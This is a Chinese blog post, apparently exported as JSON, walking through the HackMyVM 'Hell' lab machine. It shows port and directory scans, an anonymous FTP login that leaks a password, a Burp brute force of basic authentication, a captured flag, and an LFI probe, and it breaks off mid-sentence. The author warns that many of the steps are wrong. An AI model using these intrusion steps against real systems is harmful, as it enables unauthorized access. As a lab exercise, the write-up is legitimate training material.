{"id":577,"date":"2024-04-17T05:45:52","date_gmt":"2024-04-16T21:45:52","guid":{"rendered":"http:\/\/162.14.82.114\/?p=577"},"modified":"2024-04-17T05:48:10","modified_gmt":"2024-04-16T21:48:10","slug":"hmv-_-hell","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/577\/04\/17\/2024\/","title":{"rendered":"hmv[-_-]Hell"},"content":{"rendered":"<h1>Hell<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170545692.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170545692.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417054512702\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f5c\u8005\u6709\u4e2a<code>readme.txt<\/code><\/p>\n<pre><code class=\"language-bash\">When booting the machine log in with the credentials: \nrun:run \n\nAnd execute the command:\nsudo run<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543084.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543084.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410144056081\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543086.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543086.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410144909217\" style=\"zoom:50%;\" \/><\/div><\/p>\n<blockquote>\n<p>\u5f3a\u70c8\u5efa\u8bae\u53c2\u7167\u8fd9\u7bc7blog\uff1a<a href=\"https:\/\/lander4k.github.io\/posts\/HMVM-Hell\/#preparaci%C3%B3n\">https:\/\/lander4k.github.io\/posts\/HMVM-Hell\/#preparaci%C3%B3n<\/a><\/p>\n<p>\u5e08\u5085\u811a\u672c\u4e00\u7ad9\u901a\uff0c\u592a\u4f18\u96c5\u4e86\uff01<\/p>\n<\/blockquote>\n<p><strong>\u9605\u8bfb\u672c\u6587\u524d\u8bf7\u6ce8\u610f\uff0c\u5207\u8bb0\u4e0d\u8981\u4e00\u8fb9\u770b\u4e00\u8fb9\u505a\uff0c\u4e0b\u9762wp\u5728\u5927\u91cf\u7684\u9519\u8bef\u4e2d\u5b58\u5728\u5c11\u91cf\u6b63\u786e\u7684\u89e3\u7b54\uff0c\u8bf7\u6ce8\u610f\u5206\u8fa8\u55f7\uff01<\/strong><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 172.20.10.3 -- -A<\/code><\/pre>\n<pre><code class=\"language-text\">Open 172.20.10.3:21\nOpen 172.20.10.3:22\nOpen 172.20.10.3:80\n\nPORT   STATE SERVICE REASON  VERSION\n21\/tcp open  ftp     syn-ack vsftpd 3.0.5\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:172.20.10.8\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 3\n|      vsFTPd 3.0.5 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_-rw-r--r--    1 0        0             256 Feb 16  2023 flag.txt\n22\/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 84:9f:33:ed:c5:e2:11:ff:20:7d:0e:d5:31:1a:f0:08 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKUt35mHiqmeX8Etve6CgCSeZwOi\/\/weJtS6LhYQqYW+AVf\/IFscFQ+TICAA6I3abQ5I9TU4n+\/cBC1BiJydGbI=\n|   256 b8:bc:0e:e3:84:af:21:ee:fb:cc:93:41:7d:9b:54:75 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILLBTRUCL9EquPItilTqvM8AEJIeAOJwUFCoN\/1F23wL\n80\/tcp open  http    syn-ack Apache httpd 2.4.52\n| http-auth: \n| HTTP\/1.1 401 Unauthorized\\x0D\n|_  Basic realm=Restricted Content\n|_http-title: 401 Unauthorized\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\nService Info: Host: 172.17.0.2; OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/172.20.10.3 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n<pre><code class=\"language-text\">Error: the server returns a status code that matches the provided options for non existing urls. http:\/\/172.20.10.3\/94a77ed1-68a1-41ba-83a0-15a21b74d601 =&gt; 401 (Length: 458). To continue please exclude the status code or the length<\/code><\/pre>\n<p>\u731c\u6d4b\u52a0\u4e86dns\uff0c\u5c1d\u8bd5\u4f7f\u7528\u522b\u7684\u626b\u63cf\u5668\u786e\u5b9a\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">sudo dirsearch -u http:\/\/172.20.10.3 -e* -i 200,300-399 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt 2&gt;\/dev\/null<\/code><\/pre>\n<p>\u626b\u4e86\u767e\u5206\u4e4b\u5341\u90fd\u6ca1\u51fa\u6765\u4e1c\u897f\uff0c\u80af\u5b9a\u52a0\u4e86dns\u89e3\u6790\u4e86\u3002<\/p>\n<h3>\u6f0f\u6d1e\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nikto -h http:\/\/172.20.10.3<\/code><\/pre>\n<pre><code class=\"language-text\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          172.20.10.3\n+ Target Hostname:    172.20.10.3\n+ Target Port:        80\n+ Start Time:         2024-04-10 02:53:21 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.52 (Ubuntu)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ \/ - Requires Authentication for realm &#039;Restricted Content&#039;\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ Apache\/2.4.52 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ 8253 requests: 0 error(s) and 3 item(s) reported on remote host\n+ End Time:           2024-04-10 02:53:39 (GMT-4) (18 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<h3>\u8e29\u70b9[1]<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543087.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543087.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410145428484\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u539f\u6765\u5982\u6b64\u3002<\/p>\n<h3>\u654f\u611f\u7aef\u53e3<\/h3>\n<p>\u5c1d\u8bd5FTP\u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ ftp 172.20.10.3\nConnected to 172.20.10.3.\n220 (vsFTPd 3.0.5)\nName (172.20.10.3:kali): Anonymous\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||9073|)\n150 Here comes the directory listing.\ndrwxr-xr-x    2 0        115          4096 Feb 16  2023 .\ndrwxr-xr-x    2 0        115          4096 Feb 16  2023 ..\n-rw-r--r--    1 0        0              34 Feb 16  2023 .passwd\n-rw-r--r--    1 0        0             256 Feb 16  2023 flag.txt\n226 Directory send OK.\nftp&gt; get .passwd\nlocal: .passwd remote: .passwd\n229 Entering Extended Passive Mode (|||19197|)\n150 Opening BINARY mode data connection for .passwd (34 bytes).\n100% |***********************************************************************************************************|    34        1.92 KiB\/s    00:00 ETA\n226 Transfer complete.\n34 bytes received in 00:00 (1.87 KiB\/s)\nftp&gt; get flag.txt\nlocal: flag.txt remote: flag.txt\n229 Entering Extended Passive Mode (|||27611|)\n150 Opening BINARY mode data connection for flag.txt (256 bytes).\n100% |***********************************************************************************************************|   256      169.95 KiB\/s    00:00 ETA\n226 Transfer complete.\n256 bytes received in 00:00 (121.95 KiB\/s)\nftp&gt; exit\n221 Goodbye.\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ cat .passwd                       \n\nThe password is: webserver2023!<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543088.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543088.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410145630922\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u554a\uff0c\u8fd9\u3002\u3002\u3002\u3002\u3002<\/p>\n<h3>\u6293\u5305\u7206\u7834[2]<\/h3>\n<pre><code class=\"language-bash\">GET \/ HTTP\/1.1\nHost: 172.20.10.3\nCache-Control: max-age=0\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close<\/code><\/pre>\n<pre><code class=\"language-text\">YWRtaW46cGFzc3dvcmQ=\nadmin:password<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4f7f\u7528<code>burp<\/code>\u7206\u7834\u4e00\u4e0b<code>basic<\/code>\u8ba4\u8bc1\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543089.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543089.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410150853001\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u9009\u4e00\u4e2a\u597d\u4e00\u70b9\u7684\u7528\u6237\u540d\u5b57\u5178\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n<pre><code class=\"language-bash\">\/usr\/share\/seclists\/Usernames\/Names\/names.txt<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543090.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543090.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410151439741\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543091.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543091.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410151520826\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543092.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543092.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410151609391\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543093.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543093.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410151649357\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543094.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543094.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410151710594\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543095.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543095.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410151751743\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">YmVpbHVsOndlYnNlcnZlcjIwMjMh\nbeilul:webserver2023!<\/code><\/pre>\n<p>\u767b\u5f55\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543096.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543096.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410151907193\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543097.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543097.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410151924527\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">Flag 2: HELL{BRUT3_F0RC3_M4Y_B3_4N_0P710N}<\/code><\/pre>\n<h3>LFI<\/h3>\n<p>\u5207\u6362\u7684\u65f6\u5019\u6ce8\u610f\u5230url\u4e3a\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/172.20.10.3\/index.php?profile=s4vitar.html<\/code><\/pre>\n<p>\u5c1d\u8bd5LFI\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543098.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543098.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410152221652\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543099.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543099.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410152244261\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543100.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543100.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410152321272\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543101.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543101.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410152357902\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u4f7f\u7528php 